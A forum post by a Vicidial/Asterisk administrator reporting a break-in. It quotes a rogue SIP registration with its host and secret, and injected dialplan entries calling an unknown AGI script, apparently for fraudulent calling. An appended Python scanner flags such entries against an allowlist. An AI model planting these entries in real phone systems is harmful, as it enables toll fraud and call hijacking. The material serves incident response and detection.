VICIDIAL HACK: some files injected
Posted: Thu Mar 09, 2023 3:32 pm
Hello,
Recently I have noticed some kind of files injected into my vicibox server. Firstly I noticed that all my carriers had disappeared: from root, when I type
( asterisk -rx "sip show registry" ) the outcome is
(104.238.131.72:45931 N Endpoint 120 Registered Thu, 09 Mar 2023 15:17:27)
and all my carriers have disappeared apart from the one above.
So I tried to find out what the matter was. I went to (/etc/asterisk/sip.conf) and saw there is an unknown carrier registered like this:
register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931
[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no
When I deleted this one and reloaded SIP, all the carriers appeared again.
I tried to find more and found some extra unknown files injected in (/etc/asterisk/extensions.conf):
[
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()
; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8398*.,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER}-----${DIALCODE}-----${CALLERID})
exten => _8398*.,n,Hangup()
; VICIDIAL campaign
exten => _8399!,1,Set(CAMPAIGN=${CUT(EXTEN,*,2)})
exten => _8399!,n,Set(DIALCODE=${CUT(EXTEN,*,3)})
exten => _8399!,n,Set(CALLERID=${CUT(EXTEN,*,4)})
exten => _8399!,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN}-----${DIALCODE}-----${CALLERID})
exten => _8399!,n,Hangup()
]
I have deleted this one, and also from the directory.
But the thing is, how have they got into my server and how have they injected the files?
And after removing them, the same injected file and carrier were put back by the hackers. How do I stop them from getting into my server?
Action done:
root password changed
Please let me know any suggestions and how to increase security.
Systems cloud server
VERSION: 2.14-830a
BUILD: 210920-2159
© 2021 ViciDial Group
Asterisk version 11.25.1-vici, tried in vicibox 7.0.4,
server Intel(R) Xeon(R) CPU E3-1230 v3 @ 3.30GHz
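The check described in the post above (comparing `sip show registry` and the contents of sip.conf and extensions.conf against what you actually configured) can be automated. The scanner below is an added example, not code from the poster, from ViciDial or from Vicibox: it flags any `register =>` line or peer section in sip.conf whose host is not on an operator-maintained allowlist, and any AGI() call in extensions.conf whose script path is not on an allowlist. The allowlist contents (the 203.0.113.10 carrier address and the agi-VDAD_ALL_outbound.agi script name) and the two sample config strings are constructed for illustration; the sample strings reuse the injected lines quoted in the post so the output can be compared with it.

```python
"""
Added example (not from the forum post, ViciDial or Vicibox): scan Asterisk
sip.conf and extensions.conf for registrations, peer hosts and AGI hooks that
are not on an operator allowlist. Allowlists and sample configs are constructed.
"""
import re
from typing import Dict, List

# Constructed allowlist of carrier hosts you actually configured.
# 203.0.113.10 is a documentation-range address standing in for a real carrier.
ALLOWED_HOSTS = {"203.0.113.10"}
# Constructed allowlist of AGI scripts the dialplan is expected to call
# (assumed name for this example; build the real set from a known-good backup).
ALLOWED_AGI = {"/usr/share/asterisk/agi-bin/agi-VDAD_ALL_outbound.agi"}

# register => user[:secret[:authuser]]@host[:port][/extension]
REGISTER_RE = re.compile(
    r"^\s*register\s*=>\s*(?P<user>[^:@\s]+)(?::(?P<secret>[^@\s]+))?@(?P<host>[^:/\s]+)"
)
SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]")
KV_RE = re.compile(r"^\s*(?P<key>\w+)\s*=>?\s*(?P<value>\S+)")
AGI_RE = re.compile(r"AGI\(\s*(?P<script>[^,)\s]+)")

Finding = Dict[str, object]


def scan_sip_conf(text: str) -> List[Finding]:
    """Flag unexpected outbound registrations and fixed-host peers in sip.conf."""
    findings: List[Finding] = []
    section = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith(";"):  # comment line
            continue
        m = REGISTER_RE.match(line)
        if m:
            if m.group("host") not in ALLOWED_HOSTS:
                # Mask the registration secret so the report itself does not leak it.
                findings.append({"file": "sip.conf", "line": lineno,
                                 "kind": "unexpected_register",
                                 "value": f"{m.group('user')}:***@{m.group('host')}"})
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group("name")
            continue
        m = KV_RE.match(line)
        if m and m.group("key") == "host" and section not in (None, "general"):
            host = m.group("value")
            # 'dynamic' peers register to us; only fixed remote hosts are checked here.
            if host != "dynamic" and host not in ALLOWED_HOSTS:
                findings.append({"file": "sip.conf", "line": lineno,
                                 "kind": "unexpected_peer_host",
                                 "value": f"[{section}] host={host}"})
    return findings


def scan_extensions_conf(text: str) -> List[Finding]:
    """Flag every AGI() call whose script path is not on the allowlist."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith(";"):
            continue
        for m in AGI_RE.finditer(line):
            script = m.group("script")
            if script not in ALLOWED_AGI:
                findings.append({"file": "extensions.conf", "line": lineno,
                                 "kind": "unexpected_agi", "value": script})
    return findings


def scan_all(sip_text: str, ext_text: str) -> List[Finding]:
    return scan_sip_conf(sip_text) + scan_extensions_conf(ext_text)


# Constructed sample: one legitimate carrier plus the injected entries from the post.
SAMPLE_SIP_CONF = """[general]
context = default
register => carrier1:secret@203.0.113.10
register => Endpoint:99ruPP41Q97qsyGT@104.238.131.72:45931

[carrier1]
type = friend
host = 203.0.113.10
qualify = yes

[Endpoint]
type = friend
context = default
host = 104.238.131.72
port = 45931
qualify = no
"""

# Constructed sample: the injected AGI hooks from the post plus one allowed hook.
SAMPLE_EXTENSIONS_CONF = """[default]
; VICIDIAL query
exten => 8397,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,QUERY)
exten => 8397,n,Hangup()
; VICIDIAL direct
exten => _8398*.,1,Set(USER=${CUT(EXTEN,*,2)})
exten => _8398*.,n,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN_DIRECT-----${USER})
; VICIDIAL campaign
exten => _8399!,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_outbound_injection-v2.agi,RUN-----${CAMPAIGN})
; assumed-legitimate hook, on the allowlist for this example
exten => 8365,1,AGI(/usr/share/asterisk/agi-bin/agi-VDAD_ALL_outbound.agi)
"""

if __name__ == "__main__":
    for f in scan_all(SAMPLE_SIP_CONF, SAMPLE_EXTENSIONS_CONF):
        print(f"{f['file']}:{f['line']} {f['kind']} {f['value']}")
```

To use it on a live box, feed it the real files (`scan_all(open("/etc/asterisk/sip.conf").read(), open("/etc/asterisk/extensions.conf").read())`) from cron and alert on any finding, and keep the allowlists in a file the Asterisk and web-server users cannot write. The scanner only detects re-injection; the post says the entries came back after being deleted, which means whatever write path the attacker is using (web UI, database, SSH or a dropped script) is still open and has to be found and closed separately.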